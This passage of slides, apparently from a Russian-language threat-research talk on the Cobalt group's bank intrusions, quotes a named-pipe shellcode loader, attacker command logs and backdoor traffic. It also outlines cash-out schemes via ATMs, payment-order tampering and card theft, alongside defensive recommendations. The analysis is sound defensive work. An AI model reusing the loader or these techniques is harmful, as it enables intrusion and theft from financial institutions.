![Page 63: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/63.jpg)
Shellcode
void *pb = VirtualAlloc(0, 0x7FFFF, 0x1000, 0x40);
HANDLE h = CreateNamedPipe(“\\.\pipe\status_8080”, PIPE_ACCESS_DUPLEX,
PIPE_TYPE_MESSAGE|PIPE_READMODE_MESSAGE, 1, 0x4B000, 0x4B000, 0, NULL);
int cb, nRead, o = 0;
if (ConnectNamedPipe(h, NULL)) {
ReadFile(h, &cb, 4, &nRead, NULL);
while (ReadFile(h, pb + o, 0x2000, &nRead, NULL)) o += nRead;
DisconnectNamedPipe(h);
CloseHandle(h);
if (o == cb) jmp pb; // Передача управления на Payload
}
ExitProcess();
![Page 64: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/64.jpg)
Методы развития атаки
Сканирование сети
Туннелирование трафика
Использование легитимных учетных записей
Living Off The Land
Инструменты системного администрирования
![Page 65: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/65.jpg)
Инструменты системного администрирования
2017-06-07 12:01:15 d02d40d \\127.0.0.1\C$\1bf296e.exe
LocalSystem
2017-05-15 15:19:04 PsKill %SystemRoot%\PSKLLSVC.EXE
LocalSystem
2017-05-15 15:19:28 PsExec %SystemRoot%\PSEXESVC.EXE
LocalSystem
2017-05-24 16:57:23 PSEXESVC %SystemRoot%\PSEXESVC.exe
LocalSystem
2017-05-24 16:59:00 AdobeDevice C:\windows\system32\smmsrv.exe
LocalSystem
![Page 66: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/66.jpg)
Cobalt Strike и PowerShell
![Page 67: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/67.jpg)
Туннелирование трафика
Beacon SMB peer-to-peer
SOCKS Proxy
![Page 68: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/68.jpg)
Расшифрованный трафик — Silence Trojan Backdoor
C:\Temp>net view
Имя сервера Заметки
-------------------------------------------------------------------------------
\\BIS217 bis217
\\BIS777 bis777
\\MSKAHO-01
\\MSKAHO-02
\\MSKBACKUP MSKBACKUP
\\MSKBACKUP1
\\MSKBACKUP2
\\MSKCLB
\\MSKCONTACT
\\MSKCRD-1
\\MSKCRD-3
\\MSKCRD-5
\\MSKRMKDC1
C:\Intel>dir
Том в устройстве C не имеет метки.
Серийный номер тома: F483-CC3F
Содержимое папки C:\Intel
11.05.2017 09:29 <DIR> .
11.05.2017 09:29 <DIR> ..
11.05.2017 09:29 202 752 cons.exe
02.09.2014 09:09 <DIR> ExtremeGraphics
11.05.2017 13:56 24 gxftcp.dat
02.09.2014 09:11 <DIR> Logs
2 файлов 202 776 байт
4 папок 162 482 122 752 байт свободно
C:\Temp>start x64.exe
C:\Temp>del netsrvc32.exe
C:\Temp>del run.exe
C:\Temp>del m64.exe
Не удается найти C:\Temp\m64.exe
![Page 69: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/69.jpg)
Рекомендации
Мониторинг аномалий в сетевом трафике
Соблюдение принципа минимальных привилегий
Включение максимального уровня UAC на рабочих станциях
Мониторинг аномальной активности учетных записей
Сегментация локальной сети
Аудит системных журналов Windows на рабочих станциях
![Page 70: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/70.jpg)
Общая схема сегментации сети
Financial Segment
Human Resources Segment
ATM Segment
IT Segment
![Page 71: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/71.jpg)
Пример аудита системных журналов Windows
Подробнее: fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
![Page 72: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/72.jpg)
ptsecurity.ru
Вывод средств
![Page 73: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/73.jpg)
Способы вывода средств
Логические атаки на банкоматы
Подмена реквизитов
Кража карточных данных
![Page 74: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/74.jpg)
Вывод средств через банкоматы
ATM Infected Hosts
Мулы
XFS API
Подробнее: https://www.ptsecurity.com/ru-ru/research/webinar/285814/
![Page 75: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/75.jpg)
Вывод средств через банкоматы
ATM Infected Hosts
Мулы
![Page 76: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/76.jpg)
Подмена реквизитов
Infected Hosts
Оператор
АРМ КБР
Легитимное
платежное
поручение
Подмена
реквизитов
Подмена реквизитов в
платёжном поручение для ЦБ РФ
![Page 77: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/77.jpg)
Кража карточных данных
Infected Hosts
Карточные
данные
Операторы
![Page 78: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/78.jpg)
Рекомендации
ATM application control
ATM monitoring
ATM reverse connect
Vulnerability testing and secure software delivery
![Page 79: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/79.jpg)
Выводы
Совершенствование методов затруднения анализа ВПО и расследования инцидентов
Эволюция техник проникновения
Эксплуатация новых уязвимостей
Продвижение в сети проходит быстрее, если существуют бреши в системе
информационной безопасности финансовой организации
Эволюция методов закрепления в сети и маскировка вредоносной активности
![Page 80: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/80.jpg)
Ссылки
• Cobalt Snatch: ptsecurity.com/upload/corporate/ru-ru/analytics/Cobalt-Snatch-rus.pdf
• Cobalt strikes back: новые атаки на финансовые организации:
ptsecurity.com/upload/corporate/ru-ru/analytics/Cobalt-2017-rus.pdf
• Актуальные киберугрозы — 2017: тренды и прогнозы:
ptsecurity.com/upload/corporate/ru-ru/analytics/Cybersecurity-threatscape-2017-rus.pdf
![Page 81: Денис Кувшинов, Александр Григорян · 2018-04-06 · Cobalt timeline CVE-2017-0199 FinSpy Zeroday First Builder First Cobalt attack CVE-2017-0199 MWI](https://reader031.vdocuments.pub/reader031/viewer/2022021917/5e7af56f561b2a02ef634ba1/html5/thumbnails/81.jpg)
Спасибо!
ptsecurity.ru